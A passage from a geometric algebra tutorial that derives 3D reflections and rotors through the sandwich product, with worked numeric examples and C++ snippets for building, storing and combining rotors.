a_1a_2v_2\v{e_1} - a_2a_2v_1\v{e_1} - a_3a_3v_1\v{e_1} + a_3a_1v_3\v{e_1} \\ & + a_1a_2v_1\v{e_2} + a_2a_2v_2\v{e_2} + a_2a_3v_3\v{e_2} - a_1a_1v_2\v{e_2} + a_1a_2v_1\v{e_2} + a_2a_3v_3\v{e_2} - a_3a_3v_2\v{e_2} \\ & + a_3a_1v_1\v{e_3} + a_2a_3v_2\v{e_3} + a_3a_3v_3\v{e_3} - a_2a_2v_3\v{e_3} + a_2a_3v_2\v{e_3} + a_3a_1v_1\v{e_3} - a_1a_1v_3\v{e_3} \\ & + a_3a_1v_2\v{e_{123}} - a_2a_3v_1\v{e_{123}} + a_1a_2v_3\v{e_{123}} - a_3a_1v_2\v{e_{123}} + a_2a_3v_1\v{e_{123}} - a_1a_2v_3\v{e_{123}} \\ \rbrack \\ =~& |a|^{-2} \lbrack \tag{pull out the basis element factors} \\ & (a_1a_1v_1 + a_1a_2v_2 + a_3a_1v_3 + a_1a_2v_2 - a_2a_2v_1 - a_3a_3v_1 + a_3a_1v_3)\v{e_1} \\ & + (a_1a_2v_1 + a_2a_2v_2 + a_2a_3v_3 - a_1a_1v_2 + a_1a_2v_1 + a_2a_3v_3 - a_3a_3v_2)\v{e_2} \\ & + (a_3a_1v_1 + a_2a_3v_2 + a_3a_3v_3 - a_2a_2v_3 + a_2a_3v_2 + a_3a_1v_1 - a_1a_1v_3)\v{e_3} \\ & + (a_3a_1v_2 - a_2a_3v_1 + a_1a_2v_3 - a_3a_1v_2 + a_2a_3v_1 - a_1a_2v_3)\v{e_{123}} \\ \rbrack \\ =~& |a|^{-2} \lbrack \tag{simplify coefficients} \\ & (a_1a_1v_1 - a_2a_2v_1 - a_3a_3v_1 + 2a_1a_2v_2 + 2a_3a_1v_3)\v{e_1} \\ & + (2a_1a_2v_1 - a_1a_1v_2 + a_2a_2v_2 - a_3a_3v_2 + 2a_2a_3v_3)\v{e_2} \\ & + (2a_3a_1v_1 + 2a_2a_3v_2 - a_2a_2v_3 - a_1a_1v_3 + a_3a_3v_3)\v{e_3} \\ & + 0\v{e_{123}} \\ \rbrack \\ =~& |a|^{-2} \lbrack (a_1^2v_1 - a_2^2v_1 - a_3^2v_1 + 2a_1a_2v_2 + 2a_3a_1v_3)\v{e_1} \\ & + (2a_1a_2v_1 - a_1^2v_2 + a_2^2v_2 - a_3^2v_2 + 2a_2a_3v_3)\v{e_2} \\ & + (2a_3a_1v_1 + 2a_2a_3v_2 - a_2^2v_3 - a_1^2v_3 + a_3^2v_3)\v{e_3} \rbrack \\ \end{align*}\]

That's a bit of a mouthful, but if we name the coefficients of each basis vector:

\[\begin{equation} \rho_1 = a_1^2v_1 - a_2^2v_1 - a_3^2v_1 + 2a_1a_2v_2 + 2a_3a_1v_3 \tag{ 9 } \end{equation} \]

\[\begin{equation} \rho_2 = 2a_1a_2v_1 - a_1^2v_2 + a_2^2v_2 - a_3^2v_2 + 2a_2a_3v_3 \tag{ 10 } \end{equation} \]

\[\begin{equation} \rho_3 = 2a_3a_1v_1 + 2a_2a_3v_2 - a_2^2v_3 - a_1^2v_3 + a_3^2v_3 \tag{ 11 } \end{equation} \]

then we're left with

\[\begin{equation} \v{ava}^{-1} = \frac{1}{|a|^2} (\rho_1 \v{e_1} + \rho_2 \v{e_2} + \rho_3 \v{e_3}) \tag{ 12 } \end{equation} \]
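
Equations 9 to 12 translate directly into a reflection function; a sketch (the name reflect_across is mine):

// Reflect v across a via the sandwich product a v a^-1 (equations 9-12)
vec3 reflect_across(vec3 a, vec3 v)
{
    const float len_sq = dot(a, a); // |a|^2
    const float rho1 = (a.x*a.x - a.y*a.y - a.z*a.z)*v.x + 2.0f*a.x*a.y*v.y + 2.0f*a.z*a.x*v.z;
    const float rho2 = 2.0f*a.x*a.y*v.x + (a.y*a.y - a.x*a.x - a.z*a.z)*v.y + 2.0f*a.y*a.z*v.z;
    const float rho3 = 2.0f*a.z*a.x*v.x + 2.0f*a.y*a.z*v.y + (a.z*a.z - a.x*a.x - a.y*a.y)*v.z;
    return vec3{rho1 / len_sq, rho2 / len_sq, rho3 / len_sq};
}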

Rotors as a combination of two reflections

Now that we can safely achieve reflection of one vector over another by way of a geometric sandwich product, rotations are right around the corner: We just reflect twice.

Let \(\v{v}\) be our input vector (the one we’d like to rotate) and say we’d like to reflect over the vectors \(\v{a}\) and then \(\v{b}\). This is just a pair of sandwich products: \(\v{v}^{\prime\prime} = \v{bv}^\prime\v{b}^{-1} = \v{bava}^{-1}\v{b}^{-1}\). If we let \(\v{R = ba}\) then by equation 5 this can be conveniently written as: \(\v{v}^{\prime\prime} = \v{RvR}^{-1}\) and \(\v{R}\) is our rotor.
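
In terms of the hypothetical reflect_across() sketch from the reflections section above, the rotation really is just two nested reflections:

// v'' = b(a v a^-1)b^-1: reflect v across a, then across b
vec3 rotate_by_double_reflection(vec3 a, vec3 b, vec3 v)
{
    return reflect_across(b, reflect_across(a, v));
}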

To see how this works, consider the following example and corresponding diagrams:

Rotation calculation example

Let \(\v{R = ba}\) with \(\v{a} = (\frac{\sqrt{3}}{2}, \frac{1}{2}, 0)\) (which is \((1,0,0)\) rotated 30 degrees counter-clockwise around the Z-axis) and \(\v{b} = (\frac{1 - \sqrt{3}}{2\sqrt{2}}, \frac{1 + \sqrt{3}}{2\sqrt{2}}, 0)\) (which is \((1,0,0)\) rotated 105 degrees counter-clockwise around the Z-axis). We’re rotating around the Z-axis because in the diagrams, positive Z is up.

Let \(\v{v} = (1,0,1)\).

Our rotated vector is therefore \(\v{v}^{\prime\prime} = \v{bv}^\prime\v{b}^{-1} = \v{b}(\v{ava}^{-1})\v{b}^{-1}\).

Let’s start with \(\v{v}^\prime\), and apply equations 9, 10, 11:

\[\begin{aligned} \rho_{a,1} &= a_1^2v_1 - a_2^2v_1 - a_3^2v_1 + 2a_1a_2v_2 + 2a_3a_1v_3 \\ \rho_{a,1} &= \left(\frac{\sqrt{3}}{2}\right)^2(1) - \left(\frac{1}{2}\right)^2(1) - (0)^2(1) + 2\left(\frac{\sqrt{3}}{2}\right)\left(\frac{1}{2}\right)(0) + 2(0)\left(\frac{\sqrt{3}}{2}\right)(1) \\ \rho_{a,1} &= \left(\frac{\sqrt{3}}{2}\right)^2 - \left(\frac{1}{2}\right)^2 \\ \rho_{a,1} &= \frac{3}{4} - \frac{1}{4} = \frac{1}{2}\\ \\ \rho_{a,2} &= 2a_1a_2v_1 - a_1^2v_2 + a_2^2v_2 - a_3^2v_2 + 2a_2a_3v_3 \\ \rho_{a,2} &= 2\left(\frac{\sqrt{3}}{2}\right)\left(\frac{1}{2}\right)(1) - \left(\frac{\sqrt{3}}{2}\right)^2(0) + \left(\frac{1}{2}\right)^2(0) - (0)^2(0) + 2\left(\frac{1}{2}\right)(0)(1) \\ \rho_{a,2} &= 2\left(\frac{\sqrt{3}}{2}\right)\left(\frac{1}{2}\right) \\ \rho_{a,2} &= \frac{\sqrt{3}}{2} \\ \\ \rho_{a,3} &= 2a_3a_1v_1 + 2a_2a_3v_2 - a_2^2v_3 - a_1^2v_3 + a_3^2v_3 \\ \rho_{a,3} &= 2(0)\left(\frac{\sqrt{3}}{2}\right)(1) + 2\left(\frac{1}{2}\right)(0)(0) - \left(\frac{1}{2}\right)^2(1) - \left(\frac{\sqrt{3}}{2}\right)^2(1) + (0)^2(1) \\ \rho_{a,3} &= -\frac{1}{4} - \frac{3}{4} \\ \rho_{a,3} &= -1 \\ \end{aligned}\]

With this done, equation 12 gets us to: \[\begin{aligned} \v{ava}^{-1} &= \frac{1}{|a|^2} (\rho_1 \v{e_1} + \rho_2 \v{e_2} + \rho_3 \v{e_3}) \\ &= (1) \left(\frac{1}{2} \v{e_1} + \frac{\sqrt{3}}{2} \v{e_2} + (-1) \v{e_3}\right) \\ \v{ava}^{-1} = \v{v}^\prime &= \frac{1}{2} \v{e_1} + \frac{\sqrt{3}}{2} \v{e_2} - \v{e_3} \\ \end{aligned}\]

Moving to our second reflection, we repeat the same process (although this time with rather more inconvenient numbers): \[\begin{aligned} \rho_{b,1} &= b_1^2v^\prime_1 - b_2^2v^\prime_1 - b_3^2v^\prime_1 + 2b_1b_2v^\prime_2 + 2b_3b_1v^\prime_3 \\ \rho_{b,1} &= \left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{1}{2}\right) - \left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{1}{2}\right) - (0)^2\left(\frac{1}{2}\right) \\ & + 2\left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{\sqrt{3}}{2}\right) + 2(0)\left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)(-1) \\ \rho_{b,1} &= \left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{1}{2}\right) - \left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{1}{2}\right) + 2\left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{\sqrt{3}}{2}\right) \\ \rho_{b,1} &= \frac{(1-\sqrt{3})^2}{16} - \frac{(1+\sqrt{3})^2}{16} + \frac{\sqrt{3}(1-\sqrt{3})(1+\sqrt{3})}{8} \\ \rho_{b,1} &= \frac{(4 - 2\sqrt{3}) - (4 + 2\sqrt{3})}{16} + \frac{\sqrt{3}(-2)}{8} \\ \rho_{b,1} &= \frac{-4\sqrt{3}}{16} - \frac{\sqrt{3}}{4} \\ \rho_{b,1} &= -\frac{\sqrt{3}}{2} \\ \\ \rho_{b,2} &= 2b_1b_2v^\prime_1 - b_1^2v^\prime_2 + b_2^2v^\prime_2 - b_3^2v^\prime_2 + 2b_2b_3v^\prime_3 \\ \rho_{b,2} &= 2\left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{1}{2}\right) - \left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{\sqrt{3}}{2}\right) + \left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{\sqrt{3}}{2}\right) \\ & - (0)^2\left(\frac{\sqrt{3}}{2}\right) + 2\left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)(0)(-1) \\ \rho_{b,2} &= 2\left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{1}{2}\right) - \left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{\sqrt{3}}{2}\right) + \left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{\sqrt{3}}{2}\right) \\ \rho_{b,2} &= \frac{(1-\sqrt{3})(1+\sqrt{3})}{8} - \frac{\sqrt{3}(1-\sqrt{3})^2}{16} + \frac{\sqrt{3}(1+\sqrt{3})^2}{16} \\ \rho_{b,2} &= \frac{-2}{8} - \frac{\sqrt{3}(4 - 2\sqrt{3})}{16} + \frac{\sqrt{3}(4 + 2\sqrt{3})}{16} \\ \rho_{b,2} &= -\frac{1}{4} - \frac{\sqrt{3}(-4\sqrt{3})}{16} \\ \rho_{b,2} &= -\frac{1}{4} + \frac{12}{16} \\ \rho_{b,2} &= \frac{1}{2} \\ \\ \rho_{b,3} &= 2b_3b_1v^\prime_1 + 2b_2b_3v^\prime_2 - b_2^2v^\prime_3 - b_1^2v^\prime_3 + b_3^2v^\prime_3 \\ \rho_{b,3} &= 2(0)\left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{1}{2}\right) + 2\left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)(0)\left(\frac{\sqrt{3}}{2}\right) - \left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)^2(-1) \\ & - \left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)^2(-1) + (0)^2(-1) \\ \rho_{b,3} &= - \left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)^2(-1) - \left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)^2(-1) \\ \rho_{b,3} &= \frac{(1+\sqrt{3})^2}{8} + \frac{(1-\sqrt{3})^2}{8} \\ \rho_{b,3} &= \frac{4 + 2\sqrt{3}}{8} + \frac{4 - 2\sqrt{3}}{8} \\ \rho_{b,3} &= \frac{(4 + 2\sqrt{3}) + (4 - 2\sqrt{3})}{8} \\ \rho_{b,3} &= 1 \\ \end{aligned}\]

Leading us finally to:

\[ \v{v}^{\prime\prime} = \v{bava}^{-1}\v{b}^{-1} = \v{bv}^\prime\v{b}^{-1} = \frac{-\sqrt{3}}{2}\v{e_1} + \frac{1}{2}\v{e_2} + \v{e_3} \]

Of course, usually you wouldn’t do it this way: you’d have \(\v{ba}\) precomputed (since that’s the rotor) and you’d just sandwich \(\v{v}\) with that. The calculation can also be simplified significantly because you know that the coefficient of \(\v{e_{123}}\) turns out to be zero. An example of this is given in the practical section below.

Reflection of \(\v{v}\) across \(\v{a}\) and \(\v{b}\) to produce \(\v{v}^{\prime\prime}\), shown in 3D (left) and a 2D top-down view (right).

You can see in the 2D diagram on the right, how each reflection inverts the angle between the input vector and the vector it’s being reflected across. In doing so twice, we have produced a total rotation by twice the angle between the two reflection vectors.

If you were to look only at the 2D diagram on the right however, you might be thinking that we only needed a single reflection. You could indeed get from one point on the circle to any other point on the circle by reflecting over just one appropriately selected vector, but this wouldn’t actually be a rotation. The 3D diagram on the left demonstrates one of the reasons why this is not sufficient: We’d end up on the wrong side of the plane of reflection. Having two reflections allows us to “rotate” part of the way with the first reflection, flipping over to the other side of the plane of rotation, and the second reflection “rotates” us the rest of the way around while getting us back across the plane of rotation to our intended rotated vector.

Does that mean that a single vector would be sufficient in 2D? Well, no, we still need two, because there’s another problem: reflection is simply not the same transformation as rotation and will, well…reflect…the relative positions of the vectors it’s applied to. Here’s the same example, but with two extra initial vectors, offset slightly from \(\v{v}\):

The same transformation applied to \(\v{v}\) and two vectors offset slightly from it

You can see how our 3 input vectors are in the wrong “order” (if you imagine going around the circle) after the first reflection, but that is fixed by the second reflection.

I confess that this is a slightly hand-wavey geometric justification that leans on one’s intuition for what reflections and rotations should look like. For the stout of heart, Jaap Suter provides a more rigorous algebraic derivation.

The identity rotor

When using rotors for rotation, you are likely to very quickly run into a situation where you want a “no-op” rotation. A rotation which transforms any input vector into itself. You want an identity rotor.

Any rotor that contains only a scalar component is an identity rotor. To see this, recall that we constructed our rotors as the geometric product of two vectors (\(\v{R} = \v{ba}\)). The rotor \(\v{R}\) produces a rotation by twice the angle between \(\v{a}\) and \(\v{b}\). If that angle is zero then twice that angle is still zero and the rotor will produce no rotation. If the angle between the two vectors is zero then we can express one of those vectors as a scalar multiple of the other (\(\v{b} = s\v{a}\) for \(s \in \mathbb{R}\)). Applying equation 2 then gives \[\begin{aligned} \v{R} &= \v{b \cdot a + b \wedge a} \\ &=(s\v{a}) \cdot \v{a} + (s\v{a}) \wedge \v{a} \\ &=s(\v{a} \cdot \v{a}) + s(\v{a} \wedge \v{a}) \\ &=s|a|^2 + s(0) \\ &=s|a|^2 \end{aligned}\]

Since we’ve placed no restrictions on \(s\) or \(\v{a}\), we may choose \(s = 1\) and \(\v{a} = (1, 0, 0)\), giving \(|a| = 1\) and hence \(\v{R} = s|a|^2 = 1\).
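
In terms of the rotor3 struct from the practical section below, a sketch of the identity rotor is simply:

rotor3 identity_rotor()
{
    rotor3 result = {};   // all bivector components zero
    result.scalar = 1.0f; // any non-zero scalar acts as an identity; 1 keeps the rotor unit-length
    return result;
}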

Axis-angle representation for rotors

Recall from regular vector algebra that \(\v{a \cdot b} = |a| |b| \cos\theta\) and \(|\v{a \times b}| = |\v{a \wedge b}| = |a| |b| \sin\theta\). With this we can modify equation 2 to get an “axis-angle-like” representation:

\[\begin{aligned} \v{R} &= \v{ba} \\ &= \v{b \cdot a + b \wedge a} \\ &= \v{b \cdot a} + |b \wedge a| \left(\frac{\v{b \wedge a}}{|b \wedge a|}\right) \\ &= |b||a|\cos\theta + |b||a|\sin\theta \left(\frac{\v{b \wedge a}}{|b \wedge a|}\right) \\ \end{aligned}\]

If we consider just the case where \(\v{a}\) and \(\v{b}\) are unit vectors separated by an angle \(\theta\) then \(|b||a| = 1\) and we can change variables to \(\v{n} = \frac{\v{b \wedge a}}{|b \wedge a|}\) the unit bivector “plane” spanning \(\v{a}\) and \(\v{b}\), to get:

\[ \v{R} = \cos\theta + \sin\theta \v{n} \]

Finally, recall that the rotor will produce a rotation equal to twice the angle between its constituent vectors and so we should actually use only half of the input angle:

\[\begin{equation} \v{R} = \cos\left(\frac{\theta}{2}\right) + \sin\left(\frac{\theta}{2}\right) \v{n} \tag{ 13 } \end{equation} \]

Which direction this rotation goes in (clockwise or counter-clockwise) depends on the handedness of your coordinate system, as seen in the example below:

Example axis-angle calculations

Taking equation 13 and substituting \(\theta = 60\) degrees and \(\v{n} = (0,0,1)\) (i.e. the unit \(\v{e_{12}}\) bivector, written in \((\v{e_{23}}, \v{e_{31}}, \v{e_{12}})\) coordinates) gives us:

\[ \v{R} = \frac{\sqrt{3}}{2} + \frac{1}{2}\v{e_{12}} \]

and if we use this to rotate the vector \(\v{v} = (1, 0, 0)\) we get:

\[\begin{aligned} \v{v^\prime} &= \v{RvR^{-1}} \\ &= \left(\frac{\sqrt{3}}{2} + \frac{1}{2}\v{e_{12}}\right)\v{e_1}\left(\frac{\sqrt{3}}{2} - \frac{1}{2}\v{e_{12}}\right) \\ &= \left(\frac{1}{4}\right)(\sqrt{3} + \v{e_{12}})\v{e_1}(\sqrt{3} - \v{e_{12}}) \\ &= \left(\frac{1}{4}\right)[(\sqrt{3} + \v{e_{12}})\v{e_1}](\sqrt{3} - \v{e_{12}}) \\ &= \left(\frac{1}{4}\right)(\sqrt{3}\v{e_1} + \v{e_{12}}\v{e_1})(\sqrt{3} - \v{e_{12}}) \\ &= \left(\frac{1}{4}\right)(\sqrt{3}\v{e_1} - \v{e_{2}})(\sqrt{3} - \v{e_{12}}) \\ &= \left(\frac{1}{4}\right)[\sqrt{3}\v{e_1}(\sqrt{3} - \v{e_{12}}) - \v{e_{2}}(\sqrt{3} - \v{e_{12}})] \\ &= \left(\frac{1}{4}\right)[(\sqrt{3}\v{e_1}\sqrt{3}) - (\sqrt{3}\v{e_1}\v{e_{12}}) - (\v{e_{2}}\sqrt{3}) + (\v{e_{2}}\v{e_{12}})] \\ &= \left(\frac{1}{4}\right)[3\v{e_1} - \sqrt{3}\v{e_2} - \sqrt{3}\v{e_{2}} - \v{e_{1}}] \\ &= \left(\frac{1}{4}\right)[2\v{e_1} - 2\sqrt{3}\v{e_2}] \\ &= \left(\frac{1}{2}\right)[\v{e_1} - \sqrt{3}\v{e_2}] \\ &= \frac{1}{2}\v{e_1} - \frac{\sqrt{3}}{2}\v{e_2} \\ &= \left(\frac{1}{2}, -\frac{\sqrt{3}}{2}, 0\right) \\ \end{aligned}\]

Which is indeed \(\v{v}\) rotated 60 degrees around the \(z\)-axis. Notice how we did not need to know (or decide) the handedness of our coordinate system in order to compute this. The calculation is the same; it just looks different when you draw/render it.

The same rotation (from the calculation above), shown in left-handed (left) and right-handed (right) coordinate systems

If you want to claim that a rotation is clockwise or counter-clockwise you need to give a reference viewpoint. If your reference is “looking along the axis” then the rotation in left-handed coordinates goes clockwise, while in right-handed coordinates it goes counter-clockwise.
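
Before moving on, here is equation 13 as a code sketch (function name mine, using the rotor3 struct from the practical section below). It maps a unit axis \((x, y, z)\) to the bivector of the plane perpendicular to it (\(x\) to \(\v{e_{23}}\), \(y\) to \(\v{e_{31}}\), \(z\) to \(\v{e_{12}}\)), matching the example above where \(\v{n} = (0,0,1)\) produced an \(\v{e_{12}}\) rotor:

rotor3 rotor_from_axis_angle(vec3 unit_axis, float angle)
{
    rotor3 result = {};
    result.scalar = cosf(angle * 0.5f);
    const float s = sinf(angle * 0.5f);
    result.yz = s * unit_axis.x; // plane perpendicular to the X axis
    result.zx = s * unit_axis.y; // plane perpendicular to the Y axis
    result.xy = s * unit_axis.z; // plane perpendicular to the Z axis
    return result;
}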

Applications: Putting rotors to work

Now that we’ve seen the theory of rotors, let’s turn our attention to more practical concerns. Below is a small collection of answers to questions I encountered myself when implementing rotors, with C++ code for reference.

How do I store a rotor in memory?

A rotor is just the geometric product of the two vectors that form the plane of rotation. In 3D it contains a scalar component and 3 bivector components, so we just store it as a tuple of 4 numbers (as we would a 4D vector in the usual homogeneous-coordinates setup):

struct rotor3
{
    float scalar; // scalar (grade 0) component
    float xy;     // e12 bivector component
    float yz;     // e23 bivector component
    float zx;     // e31 bivector component
};

How do I represent an orientation (as opposed to a rotation)?

Rotors (like quaternions) encode rotations: transforms that, when applied to an orientation, produce a new orientation. There is no such thing as “a rotor pointing along the X-axis”, for example. This is great when we have something with a particular orientation (e.g. a player character facing down the X axis) and want to transform it to some other orientation (e.g. you want your player character to instead face down the Z axis), but it doesn’t immediately help us encode “the player character is facing down the X axis” in the first place.

Thankfully we can select a convention for a “default” orientation (“facing down the X axis” for example) and then encode all orientations as rotations away from that default orientation.
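
One possible encoding of that convention (a sketch; the names are mine, and it leans on the from_to_rotor() function developed below):

// Convention: the "default" orientation faces down the X axis
const vec3 default_forward = {1.0f, 0.0f, 0.0f};

// An orientation, stored as the rotation away from the default orientation
rotor3 orientation_from_forward(vec3 forward)
{
    return from_to_rotor(default_forward, forward);
}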

How do I produce a rotor representing a rotation from orientation A to orientation B?

Let’s represent an orientation as a unit vector along the “forward” direction of the orientation. Now we have two vectors representing the initial and final orientations and we want to rotate from the initial vector to the final vector.

We could create a rotor just from those two vectors directly, but while that would produce a rotation in the correct plane in the correct direction, it would rotate twice as far as we’d like (since the rotation you get by applying a rotor to a vector is twice the angle between the two vectors that defined the rotor). The naive approach would be to compute the angle between our two vectors and then use an existing axis-angle rotation function to produce a “half-way” vector and then construct our rotor from that:

vec3 axis_angle_rotate(vec3 axis, float angle, vec3 vector_to_rotate);

rotor3 from_to_naive(vec3 from_dir, vec3 to_dir)
{
    // Calculations below assume the input directions are normalised
    from_dir = from_dir.normalized();
    to_dir = to_dir.normalized();

    // Get the angle between the input directions
    const float theta = acosf(dot(from_dir, to_dir));

    // Get the axis of rotation/normal of the plane of rotation
    const vec3 axis = cross(from_dir, to_dir).normalized();

    // Compute the second vector for our rotor, half way between from_dir and to_dir
    const vec3 halfway = axis_angle_rotate(axis, theta*0.5f, from_dir);

    const vec3 wedge = {
        (halfway.x * from_dir.y) - (halfway.y * from_dir.x),
        (halfway.y * from_dir.z) - (halfway.z * from_dir.y),
        (halfway.z * from_dir.x) - (halfway.x * from_dir.z),
    };
    rotor3 result = {};
    result.scalar = dot(from_dir, halfway);
    result.xy = wedge.x;
    result.yz = wedge.y;
    result.zx = wedge.z;
    return result;
}

Of course this assumes the existence of an axis_angle_rotate() function, but thankfully equation 13 provides exactly that. If we normalise the from- and to-vectors and denote the resulting directions as \(\v{a}\) and \(\v{b}\) respectively then we can get the angle between them as \(\theta = \cos^{-1}(\v{a \cdot b})\) and our from-to rotor is:

\[\begin{equation} \v{R} = \cos\left(\frac{\theta}{2}\right) + \sin\left(\frac{\theta}{2}\right)\left(\frac{\v{b \wedge a}}{|b \wedge a|}\right) \tag{ 14 } \end{equation} \]

rotor3 from_to_rotor(vec3 from_dir, vec3 to_dir)
{
    // Calculations below assume the input directions are normalised
    from_dir = from_dir.normalized();
    to_dir = to_dir.normalized();

    // Get the angle between the input directions
    const float theta = acosf(dot(from_dir, to_dir));
    const float cos_half_theta = cosf(theta * 0.5f);
    const float sin_half_theta = sinf(theta * 0.5f);

    // Compute the normalized "to_dir wedge from_dir" product
    const vec3 wedge = vec3 {
        (to_dir.x * from_dir.y) - (to_dir.y * from_dir.x),
        (to_dir.y * from_dir.z) - (to_dir.z * from_dir.y),
        (to_dir.z * from_dir.x) - (to_dir.x * from_dir.z),
    }.normalized();

    rotor3 result = {};
    result.scalar = cos_half_theta;
    result.xy = sin_half_theta * wedge.x;
    result.yz = sin_half_theta * wedge.y;
    result.zx = sin_half_theta * wedge.z;
    return result;
}

This will be correct, but it requires us to do a bunch of trigonometry; if we could achieve the same thing without trigonometry then that might be faster (though as with all performance-motivated changes, you should measure it).

Recall that a rotor defined as the product of two vectors will produce a rotation from one toward the other. The problem is that it will produce a rotation by twice the angle between the input vectors, so if we just used the product of our input vectors it would “rotate past” our destination vector. Naturally then, we can swap out one of the arguments for a vector that is half-way between from and to, such that twice the rotation will be precisely what we’re looking for!

rotor3 from_to_rotor_notrig(vec3 from_dir, vec3 to_dir)
{
    from_dir = from_dir.normalized();
    to_dir = to_dir.normalized();

    const vec3 halfway = (from_dir + to_dir).normalized();

    const vec3 wedge = {
        (halfway.x * from_dir.y) - (halfway.y * from_dir.x),
        (halfway.y * from_dir.z) - (halfway.z * from_dir.y),
        (halfway.z * from_dir.x) - (halfway.x * from_dir.z),
    };
    rotor3 result = {};
    result.scalar = dot(from_dir, halfway);
    result.xy = wedge.x;
    result.yz = wedge.y;
    result.zx = wedge.z;
    return result;
}

I should note, however, that both of these implementations have at least one downside: They fail at (or very close to) from_dir == -to_dir. In the trigonometry-free version, this is because at that point the “halfway” vector will be zero and can’t be normalized so you’ll get garbage. You’d need to either be sure this will not happen or check for it and do something else in that case.
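
One possible guard, as a sketch of the "check for it and do something else" option (thresholds and names are mine, and it assumes the usual vec3 arithmetic operators): for nearly-opposite inputs, any unit vector perpendicular to from_dir spans a valid plane for a 180-degree rotation, so we can pick one arbitrarily.

rotor3 from_to_rotor_safe(vec3 from_dir, vec3 to_dir)
{
    from_dir = from_dir.normalized();
    to_dir = to_dir.normalized();

    if (dot(from_dir, to_dir) < -0.9999f)
    {
        // The halfway vector would be ~zero here, so instead build a
        // 180-degree rotor from from_dir and an arbitrary perpendicular
        // unit vector (two perpendicular unit vectors give a rotation of
        // twice 90 degrees in their shared plane).
        vec3 axis = {1.0f, 0.0f, 0.0f};
        if (fabsf(from_dir.x) > 0.9f) { axis = {0.0f, 1.0f, 0.0f}; }
        const vec3 ortho = (axis - (from_dir * dot(axis, from_dir))).normalized();

        rotor3 result = {};
        result.scalar = dot(from_dir, ortho); // zero: the vectors are perpendicular
        result.xy = (ortho.x * from_dir.y) - (ortho.y * from_dir.x);
        result.yz = (ortho.y * from_dir.z) - (ortho.z * from_dir.y);
        result.zx = (ortho.z * from_dir.x) - (ortho.x * from_dir.z);
        return result;
    }
    return from_to_rotor_notrig(from_dir, to_dir);
}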

How do I append/combine/multiply two (or more) rotors?

Rotors can be combined by just multiplying them together with the geometric product. We know that a rotor \(\v{R}\) is applied to a vector \(\v{v}\) by way of the sandwich product \(\v{v}^\prime = \v{RvR}^{-1}\) so if we had two rotors \(\v{R}_1\) and \(\v{R}_2\) we’d just apply them in order: \(\v{v}^\prime = \v{R}_2\v{R}_1\v{v}\v{R}_1^{-1}\v{R}_2^{-1} = (\v{R}_2\v{R}_1)\v{v}(\v{R}_2\v{R}_1)^{-1}\) and we see that the combined rotor \(\v{R}_3 = \v{R}_2\v{R}_1\).

Of course this only works if the product of two rotors is again a rotor. In order to convince ourselves that this is the case we can just do the multiplication:

Geometric product of two 3D rotors

We’d like to verify that the product of two 3D rotors (each of which consist of one scalar component and 3 bivector components) is another rotor consisting of one scalar component and 3 bivector components.

Say we have two rotors: \[ \v{S} = s_0 + s_{12}\v{e_{12}} + s_{23}\v{e_{23}} + s_{31}\v{e_{31}} \\ \v{T} = t_0 + t_{12}\v{e_{12}} + t_{23}\v{e_{23}} + t_{31}\v{e_{31}} \\ \]

We just multiply them out as usual:

\[\begin{aligned} \v{ST} &= (s_0 + s_{12}\v{e_{12}} + s_{23}\v{e_{23}} + s_{31}\v{e_{31}})(t_0 + t_{12}\v{e_{12}} + t_{23}\v{e_{23}} + t_{31}\v{e_{31}}) \\ \v{ST} &= (s_0)(t_0 + t_{12}\v{e_{12}} + t_{23}\v{e_{23}} + t_{31}\v{e_{31}}) \\ &+ (s_{12}\v{e_{12}})(t_0 + t_{12}\v{e_{12}} + t_{23}\v{e_{23}} + t_{31}\v{e_{31}}) \\ &+ (s_{23}\v{e_{23}})(t_0 + t_{12}\v{e_{12}} + t_{23}\v{e_{23}} + t_{31}\v{e_{31}}) \\ &+ (s_{31}\v{e_{31}})(t_0 + t_{12}\v{e_{12}} + t_{23}\v{e_{23}} + t_{31}\v{e_{31}}) \\ \v{ST} &= (s_0 t_0) + (s_0 t_{12}\v{e_{12}}) + (s_0 t_{23}\v{e_{23}}) + (s_0 t_{31}\v{e_{31}}) \\ &+ (s_{12}\v{e_{12}} t_0) + (s_{12}\v{e_{12}}t_{12}\v{e_{12}}) + (s_{12}\v{e_{12}}t_{23}\v{e_{23}}) + (s_{12}\v{e_{12}}t_{31}\v{e_{31}}) \\ &+ (s_{23}\v{e_{23}}t_0) + (s_{23}\v{e_{23}}t_{12}\v{e_{12}}) + (s_{23}\v{e_{23}}t_{23}\v{e_{23}}) + (s_{23}\v{e_{23}}t_{31}\v{e_{31}}) \\ &+ (s_{31}\v{e_{31}}t_0) + (s_{31}\v{e_{31}}t_{12}\v{e_{12}}) + (s_{31}\v{e_{31}}t_{23}\v{e_{23}}) + (s_{31}\v{e_{31}}t_{31}\v{e_{31}}) \\ \v{ST} &= (s_0 t_0) + (s_0 t_{12}\v{e_{12}}) + (s_0 t_{23}\v{e_{23}}) + (s_0 t_{31}\v{e_{31}}) \\ &+ (s_{12}t_0\v{e_{12}}) + (s_{12}t_{12}\v{e_{12}}\v{e_{12}}) + 